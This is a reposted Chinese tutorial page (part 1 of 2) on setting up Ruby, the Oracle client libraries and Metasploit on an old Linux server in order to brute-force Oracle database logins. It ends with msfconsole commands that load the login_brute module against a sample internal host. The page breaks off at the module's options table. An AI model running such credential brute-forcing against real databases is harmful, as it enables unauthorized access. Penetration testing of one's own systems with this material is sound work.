当前位置:七道奇文章资讯安全技术网络技术
日期:2011-07-17 12:14:00  来源:本站整理

若何暴力破解oracle用户名及其密码[网络技术]

赞助商链接



  本文“若何暴力破解oracle用户名及其密码[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

下面就说下怎么安装和使 用,主如果安装,因为有些需求注意的东西,请注意斜体字.

    1、先装gcc编译环境 (我用的server对比惨,最小安装,系统也老,FC2.)
    rpm -ivh cpp-3.3.3-7.i386.rpm
    rpm -ivh glibc-kernheaders-2.4-8.44.i386.rpm
    rpm -ivh glibc-headers-2.3.3-27.i386.rpm
    rpm -ivh glibc-devel-2.3.3-27.i386.rpm
    rpm -ivh binutils-2.15.90.0.3-5.i386.rpm
    rpm -ivh gcc-3.3.3-7.i386.rpm
    2、安装oracle客户端
    下载:http://www.oracle.com/technology/software/tech/oci/instantclient/htdocs/linuxsoft.html
    rpm包安装对比费事,当然你也可以下载紧缩包安装,按照阐明来装便可.
    rpm -ivh oracle-instantclient11.1-basic-11.1.0.7.0-1.i386.rpm oracle-instantclient11.1-devel-11.1.0.7.0-1.i386.rpm oracle- instantclient11.1-sqlplus-11.1.0.7.0-1.i386.rpm
    装完后,履行下面2条号令,同时设置在环境变量里,加入到/etc/profile最后便可:
    LD_LIBRARY_PATH=/usr/lib/oracle/11.1/client/lib/
    export LD_LIBRARY_PATH
    3、装ruby
    下载:http://www.ruby-lang.org/en/downloads/
    tar zxvf ruby-1.8.5-p231.tar.bz2   #(这个注意下,不要装1.9的版本,不然会呈现MSF不能读CSV文件的问题,报NameError uninitialized constant CSV::Reader错误)
    cd ruby-1.8.5-p231
    ./configure
    make && make install
    4、装ruby-oci8
    安装阐明:http://ruby-oci8.rubyforge.org/en/InstallForInstantClient.html
    下载:http://rubyforge.org/projects/ruby-oci8/
    这个ruby-oci8-1.0.6版本大概 ruby-oci8-2.0.0都可以.
    安装前要确认环境变量,即sqlplus能正常运行便可:
    LD_LIBRARY_PATH=/usr/lib/oracle/10.2.0.3/client/lib
    export LD_LIBRARY_PATH
    tar zxvf ruby-oci8-2.0.0.tar.gz
    cd ruby-oci8-2.0.0
    make
    make install
    5、装ruby-dbi
    下载:http://rubyforge.org/frs/?group_id=234
    用dbi-0.2.2,一定不要新过这个版本,不然MSF会报“The dbi module is not available!”错误.
    cd dbi-0.2.2
    ruby setup.rb config --with=dbi,dbd_oracle  #(--with=dbi,dbd_oracle这个参数一定要,不然还是报dbi错误)<--IWMS_AD_BEGIN-->
    <--IWMS_AD_END-->
    ruby setup.rb setup
    ruby setup.rb install
    6、下载安装利用MSF
    svn co http://metasploit.com/svn/framework3/trunk/ ./
    ./msfconsole
    假如msf报错贫乏openssl、zlib、gem,则需求先装下.
    rpm -ivh openssl-devel-0.9.7a-35.i386.rpm
    cd ruby-1.8.5-p231/ext/openssl
    ruby extconf.rb
    make
    make install
    装zlib
    cd ruby-1.8.5-p231/ext/zlib
    ruby extconf.rb
    make
    make install
    装gem
    tar zxvf rubygems-1.3.1.tgz
    cd rubygems-1.3.1
    ruby setup.rb all
    一切ok便可以运行了(假如还缺别的按要求装上,用gem安装ruby模块很便利):
    msf > use auxiliary/admin/oracle/login_brute
    msf auxiliary(login_brute) > set RHOST 192.168.0.11
    RHOST => 192.168.0.11
    msf auxiliary(login_brute) > set SID oracle
    SID => oracle
    msf auxiliary(login_brute) > info
    Name: Oracle brute forcer for known default accounts.
    Version: 6876
    License: Metasploit Framework License (BSD)
    Provided by:
    MC <mc@metasploit.com>
    Basic options:
    Name     Current Setting                                             Required  Description ----           ---------------                                                    --------  -----------

[1] [2]  下一页


  以上是“若何暴力破解oracle用户名及其密码[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 若何暴力破解oracle用户名及其密码
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .